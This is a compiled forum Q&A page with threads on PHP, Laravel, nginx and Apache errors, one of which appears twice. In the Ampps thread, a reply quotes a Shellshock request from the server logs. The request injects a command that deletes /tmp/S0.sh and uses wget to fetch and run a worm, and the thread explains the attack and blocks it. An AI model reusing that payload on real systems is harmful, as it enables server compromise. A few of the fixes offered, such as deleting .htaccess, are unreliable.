This only happens on Google Chrome and Chromium with a fresh install of Laravel.
The page shows blank and in the console it says:
(failed) net::ERR_INCOMPLETE_CHUNKED_ENCODING
Instead of the default hello view that which says “You have arrived.”
My server is Debian Wheezy with ISPConfig, Apache 2.2 and PHP 5.4
Does anybody knows how can I fix this?
Had the same problem on a Ubuntu 14.04 Vagrant box running nginx. The site is a Laravel 5 that one day surprisingly started throwing those errors.
After reading this comment:
https://github.com/barryvdh/laravel-debugbar/issues/262#issuecomment-74385850
I've checked my /var/log/nginx/vagrant.com-error.log.1 and saw:
[crit] 1020#0: *774 open() "/var/lib/nginx/fastcgi/3/03/0000000033" failed (13: Permission denied) while reading upstream, client: 192.168.56.1, server: 192.168.56.102.xip.io, request: "GET /_debugbar/assets/javascript?1423122680 HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "my-host", referrer: "http://url/that/fails"
Double-checked my Vagrant box nginx lib directory permissions ll /var/lib/
drwxr-xr-x 7 root root 4096 feb 9 11:28 nginx/
... where internally was using www-data user: ll /var/lib/nginx/
drwx------ 12 www-data root 4096 may 5 13:32 fastcgi/
So I ran:
chown -R www-data:www-data /var/lib/nginx
And the error in Chrome disappeared.
Just posting here to notice the solution, even all the credits should go to the linked original comment.
I had the exact same problem that you have. I found a work-around over here on this forum thread:
http://laravel.io/forum/02-08-2014-another-problem-only-with-chrome
The code used by the person who provided a the workaround: http://laravel.io/bin/eyyDj#4,7
The gist of it is to just up and tell Chrome how much data to expect for every request, so it doesn't have to chunk the data.
I'm seeing reports that upgrading to PHP 5.5 also fixes this problem, but not all of us can have that kind of control over our servers.
Edit: It looks as if blindly applying this work-around causes errors on redirects. This is the code that I'm now using:
App::after(function($request, $response) {
// Fixes a strange issue with Chrome. Should theoretically be removeable
// after upgrading PHP to 5.5 from 5.4
if ($response instanceof Illuminate\Http\Response) {
$response->header('Content-Length', strlen($response->getOriginalContent()));
}
});
Note that JSON responses are a separate type and may still have the chunking issue, so this solution may need to evolve somewhat to accommodate that.
Related
I have a php docker app running with multiple containers such as
j_php-fpm_1 and j_nginx_1
j_php-fpm_1 is the container with the whole project (Magento / php but that's not relevant here).
My issue is the following
At some point in the app I trigger A technical problem with the server created an error. Try again to continue what you were doing. If the problem persists, try again later. which means I have a server error within my php even before entering the framework.
So I have been into my j_php-fpm_1 but the file can't be read due to permission denied
make bash
docker-compose exec -u magento php-fpm bash
magento#315933593d37:/var/www/magento$ ls -al /var/log/php7.3-fpm.log -rw------- 1 root root 0 Jan 3 10:04 /var/log/php7.3-fpm.log
magento#315933593d37:/var/www/magento$
cat: /var/log/php7.3-fpm.log: Permission denied
Then I tried to check the live nginx logs
docker logs j_nginx_1
As a result I see my request triggering the error, but still no errors printed in the log
172.21.0.1 - - [05/Jan/2022:15:22:34 +0000] "POST /admin_sdj/sponsorship/index/sponsorship/key/d81ba9d66a439a3fe7a2e70e9567830be8b3a1cef39f8984002129045622fb59/id/1/?isAjax=true HTTP/1.1" 200 190 "http://j.dev-cpy.fr/admin_sdj/customer/index/edit/id/1/key/05dae1e3543127f8c02295e29b06b70722d085f69a37b0d7155fc257ce6b1257/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
access log and error log from the ngning container are empty.
Any ideas where I can find my error log ?
PS : I can't change the php fpm logfile rights.
EDIT : Connecting as root with docker exec -it --user root j_php-fpm_1 /bin/bash shows the fpm log file is empty too.
I don't know where to look at anymore
I found the my error's origin; it was actually due to a wrong url path triggering a 404 error...which was triggering then the server error in some following request. Still no idea about the logs though, but at least my issue is solved right now. I let the topic open in case someone has an idea.
Today I meet a strange question:
our project need to online a new module
when I execute artisan down in online environment and visit the site, I found it isn't show the maintenance page, it also show the home page
I check the CheckForMantenance Middleware has aleady add to global route middleware, the down file in storage/framework is exist
I execute php index.php it return the maintenance page, but When I visit the site from brown or curl it show the home page
I also run in test server and local, it all work well
I add a new route for test middlware, and visit the url used by curl and brown, and result is 404, the route does not found
I think it may be caused by router cache, but there is no cache file on bootstrap/cache or storage/framework, because I never open router cache!
I have no idea, so I modify the index file, add write header function at top, and redirect to a error html, the crazy thing happened it also show the home page!!!!!!
What happend? I'm sure the project path is right
Finally I reload the php-fpm and it recovery normal, the maintenance view work, redirect url work, and route normal
I don't understand still now, but I guess it may by caused by opcache?
I open the opcache ext, and use the default setting;
env:
laravel: 5.3
nginx: 1.8.1
php-fpm: 7.0.9 with opcache ext
First check your fpm logs, usually, something like this will pop up (check debug/log levels) between the notices:
[01-Mar-2017 23:59:45] NOTICE: [pool www] child 16951 started
[01-Mar-2017 23:59:48] WARNING: [pool www] child 14754
exited on signal 11 (SIGSEGV - core dumped) after 4393.427133 seconds
from start
You have to disable opcache unfortunately. I've been seeing this issue since php 5.5 all the way to 7.1 , you will also find these in the error logs:
2017/03/02 10:00:24 [error] 30498#30498: *170523 upstream timed out
(110: Connection timed out) while reading response header from upstream,
client: 81.243.144.1xx, server: fake.test.pro,
request: "POST /api/users/53e4203cfd1c46e08d5b570c2c93ff86/items HTTP/1.1",
upstream: "fastcgi://unix:/var/run/php/php7.0-fpm.sock", host: "fake.test.pro",
referrer: "http://fake.test.pro/console"
In particular with Laravel, but I've also seen it on wordpress installations. It stops when I disable opcache on all versions of php-fpm
There are bugreports around on this issue but no fixes so far. I always end up doing this :
[opcache]
; Determines if Zend OPCache is enabled
opcache.enable=0
in /etc/php/7.*/fpm/php.ini files. Then my application is robust again and it costs us 150ms. it sucks.
Hi Friends,
I am using Ampps server with php 5.3.29 in windows server datacenter.
unfortunately i am getting the following prompt in windows server and my site down.
Prompt title:
Microsoft windows
Prompt Message:
Apache http server has stopped working.
A problem caused the program to stop working correctly. windows will close the program and notify you if a solution is available.
Trace:
When i tracing error and access logs, i found the following logs as the cause.
In Apache access log:
202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
217.248.177.30 - - [10/Dec/2014:06:11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
81.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
In Apache error log:
[Wed Dec 10 07:25:04.401073 2014] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246] script not found or unable to stat: D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
Please help me.
There is a Web bot trying to get authority so it can wget and execute something like S0.py, which I imagine is a worm so the download server is compromised.
Id like a copy of S0.sh if you happen to get one give it to exploit-db or something like it.
The clever command is:
Get /cgi-bin/authLogin.cgi HTTP/1.1.Host: 127.0.0.1.User-Agent:() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
The file is executed following download.
I suppose there's something about HDB_DATA, which I don't even have.
"Information is Paramount!"
If you try to open this file, what happens?
D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
The message indicates that the file does not exist, as indicated by the 404 error and the message "script not found".
Finally i denied those client to access the cgi-bin directory.
in cgi-bin directory i created a .htaccess file
I added following line in .htaccess
Deny From all.
I don't think authLogin.cgi really matters other than it might allow someone to execute. The problem is that the user tries to or successfully removes /tmp/S0.sh and make a directory php in the share folder and then execute wget.
/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
Here is what came up after all that time of wondering:
http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html
"S0.sh consists of two main parts ... the first part does the initial setup and downloads additional programs, and then the second part installs the worm and executes some additional commands."
So it was a real treat catching this action and initially no one knew to call it Shellshock. There is a copy of S0.sh there and you can see it's a worm, which I presumed was the case.
From what I read the worm is just browsing the IP space looking for anyone listening to port 8080.
This only happens on Google Chrome and Chromium with a fresh install of Laravel.
The page shows blank and in the console it says:
(failed) net::ERR_INCOMPLETE_CHUNKED_ENCODING
Instead of the default hello view that which says “You have arrived.”
My server is Debian Wheezy with ISPConfig, Apache 2.2 and PHP 5.4
Does anybody knows how can I fix this?
Had the same problem on a Ubuntu 14.04 Vagrant box running nginx. The site is a Laravel 5 that one day surprisingly started throwing those errors.
After reading this comment:
https://github.com/barryvdh/laravel-debugbar/issues/262#issuecomment-74385850
I've checked my /var/log/nginx/vagrant.com-error.log.1 and saw:
[crit] 1020#0: *774 open() "/var/lib/nginx/fastcgi/3/03/0000000033" failed (13: Permission denied) while reading upstream, client: 192.168.56.1, server: 192.168.56.102.xip.io, request: "GET /_debugbar/assets/javascript?1423122680 HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "my-host", referrer: "http://url/that/fails"
Double-checked my Vagrant box nginx lib directory permissions ll /var/lib/
drwxr-xr-x 7 root root 4096 feb 9 11:28 nginx/
... where internally was using www-data user: ll /var/lib/nginx/
drwx------ 12 www-data root 4096 may 5 13:32 fastcgi/
So I ran:
chown -R www-data:www-data /var/lib/nginx
And the error in Chrome disappeared.
Just posting here to notice the solution, even all the credits should go to the linked original comment.
I had the exact same problem that you have. I found a work-around over here on this forum thread:
http://laravel.io/forum/02-08-2014-another-problem-only-with-chrome
The code used by the person who provided a the workaround: http://laravel.io/bin/eyyDj#4,7
The gist of it is to just up and tell Chrome how much data to expect for every request, so it doesn't have to chunk the data.
I'm seeing reports that upgrading to PHP 5.5 also fixes this problem, but not all of us can have that kind of control over our servers.
Edit: It looks as if blindly applying this work-around causes errors on redirects. This is the code that I'm now using:
App::after(function($request, $response) {
// Fixes a strange issue with Chrome. Should theoretically be removeable
// after upgrading PHP to 5.5 from 5.4
if ($response instanceof Illuminate\Http\Response) {
$response->header('Content-Length', strlen($response->getOriginalContent()));
}
});
Note that JSON responses are a separate type and may still have the chunking issue, so this solution may need to evolve somewhat to accommodate that.
I had a LAMP application running wordpress and I deleted the whole directory and replaced with new files - php based.
Now, when I go to view my server running CentOS - it just shows a 500 Internal Server error.
I've tried:
restarting server
restarting apache service itself
both completed successfully, but this didn't fix anything. Now, I do not know where to go from here.
apache logs # /usr/local/apache/logs/error_log on apache:
[Tue Apr 22 11:12:15 2014] [error] [] SoftException in Application.cpp:357: UID of script "index.php" is smaller than min_uid
I found the fix myself, this wasn't an error with Mysql at all, but rather a permissions issue with the index.php file I had.
The error, which I found in /usr/local/apache/logs/error_log was:
:is smaller than min_uid Premature end of script headers: index.php
To fix, I did this:
ls -l in the directory causing the issue (mine was public_html)
You should see the index file (e.g. index.php) that should be causing the issue. It is due to a root user having the only permission to the file and not your CPanel (or system) username. (note this system/cpanel name)
Run the following within the errorneous directory(Note: this command must be run within all subdirectories of the primary errorneous directory.):
sudo chown yoursystemuserhere:yoursystemgroupuserhere index.php
or to apply to the whole directory (thanks to #Prix):
sudo chown -R user:group /folder
You're all set.
Further literature here: http://www.inmotionhosting.com/support/website/general-server-setup/uid-smaller-than-min-uid
I hope this helps someone else in the future.
I had similar symptoms on my cPanel VPS - I was able to use easyApache to recompile Apache and PHP which fixed the problem for me.
(I realise my problem was slightly different to yours, but it may be helpful for people in the future who have the same problem I had).
chown -R user.usergroup /path_to_the_directory
Will resolve this. It is basically permission issues.
just install wordpress latest version make sure you have atleast php version 5.3 and above also look global register variable if it off or just delete htacess file from server and see what will happens
generally 500 internal server gives when file permission is missing so you should delete htacess file